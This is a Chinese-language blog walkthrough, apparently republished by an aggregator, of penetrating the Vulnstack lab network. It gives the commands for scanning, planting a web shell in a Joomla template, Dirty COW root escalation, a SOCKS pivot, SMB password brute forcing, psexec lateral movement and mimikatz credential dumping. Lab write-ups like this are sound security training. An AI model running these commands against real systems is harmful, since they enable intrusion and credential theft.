网站建设免费空间注册导航公司名称可以和网站域名不同吗
news/
2025/9/30 9:58:50/
文章来源:
网站建设免费空间注册导航,公司名称可以和网站域名不同吗,云南网站建设模块,wordpress增加关键词文章目录 环境配置靶场介绍靶场设置 外网渗透信息收集端口扫描目录扫描 漏洞发现与利用获取ssh账号密码#xff0c;登录centos 提权 内网渗透建立代理内网信息收集smb暴破#xff0c;获取本地管理员密码 横向移动使用psexec模块上线msf 环境配置
靶场介绍
靶场地址
http:/… 文章目录 环境配置靶场介绍靶场设置 外网渗透信息收集端口扫描目录扫描 漏洞发现与利用获取ssh账号密码登录centos 提权 内网渗透建立代理内网信息收集smb暴破获取本地管理员密码 横向移动使用psexec模块上线msf 环境配置
靶场介绍
靶场地址
http://vulnstack.qiyuanxuetang.net/vuln/detail/5/打开虚拟机镜像为挂起状态第一时间进行快照部分服务未做自启重启后无法自动运行。 挂起状态账号已默认登陆centos为出网机第一次运行需重新获取桥接模式网卡ip。 除重新获取ip不建议进行任何虚拟机操作。 参考虚拟机网络配置添加新的网络该网络作为内部网络。 注名称及网段必须符合下面图片进行了固定ip配置。 靶场设置
网络配置要求攻击机kali为net8外网的centos其中一个为net8另一个net2
拓扑图这里我的kali为192.168.1.5 外网渗透
信息收集
端口扫描
使用nmap进行端口服务操作系统探测
nmap -sS -P0 -sV -O 192.168.1.110得到目标开放了2280和3306 访问一下目标的80端口看到是个joomla CMS搭建的网站脚本语言为php
目录扫描
dirb http://192.168.1.110/发现目标存在admin目录 访问一下是个后台的登录界面弱口令进不去
漏洞发现与利用
使用msf获取joomla cms相关信息
use auxiliary/scanner/http/joomla_version
set rhosts http://192.168.1.110/
run得到具体版本,没啥用不能利用 上御剑扫一下后台发现一大堆东西 phpinfo() mysql配置信息 navicat远程连接mysql看到管理员密码被加密了 这里可以根据官方文档修改添加管理员账号密码 如何恢复或重置管理员密码
这里注意表的名字改成你自己的
登录后台
http://192.168.1.103/administrator/index.php admin2 secretgetshell
点击
extensions--templates--templates--protostar details and files--index.php--save写入蚁剑shell 连接成功 命令执行发现用不了php开启了禁用函数 使用蚁剑插件绕过函数禁用
获取ssh账号密码登录centos
看下目录里面有没有有用的信息发现一个账号密码前期信息收集知道开放了22端口远程连接试一下 连接成功
提权
uname -r 发现linux内核版本很低可以用脏牛提权
https://github.com/imust6226/dirtcow靶机里vi dirty.c直接将上面dirty.c里的内容复制进去编译一下
gcc -pthread dirty.c -o dirty -lcrypt./dirty 123456 ---执行exp创建账户firefart密码123456切换到firefart账户获取root权限
内网渗透
建立代理
掏出祖传的EWearthworm上传到靶机并执行让靶机当做进入内网的跳板 kali里记得修改一下走靶机地址
vim /etc/proxychains.conf //配置proxychains将最后一行的socks4注释掉添加下面的行端口为跳板机上的ew监听的8888socks5 192.168.1.100 8888内网信息收集
直接上神器fscan 由此可以看出 已经拿到root权限的centos有两张网卡 一张是192.168.216.131 一张是192.168.93.100 Nginx代理服务器ubantu192.168.93.120 一台非TEST域内win7专业版主机192.168.93.30 一台TEST域内win2008主机192.168.93.20 一台TEST域控主机win server 2012192.168.93.10 还跑出来了疑似的SSH账号尝试登录发现不正确挂代理尝试登录 smb暴破获取本地管理员密码
这里我的字典里没有这个密码我手动加上去的2030都是这个密码
use auxiliary/scanner/smb/smb_login
set rhosts 192.168.93.30
set smbuser administrator
set pass_file top10k.txt
run暴破密码administrator 123qwe!ASD
横向移动
使用psexec模块上线msf
use exploit/windows/smb/psexec
set rhost 192.168.93.30
set payload windows/meterpreter/bind_tcp
set smbuser administrator
set smbpass 123qwe!ASD
run拿下win7 拿下win2008 接下来通过msf上传mimikatz进行密码读取
#提升权限
privilege::debug抓取密码
lsadump::lsa /patch
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/922677.shtml
如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!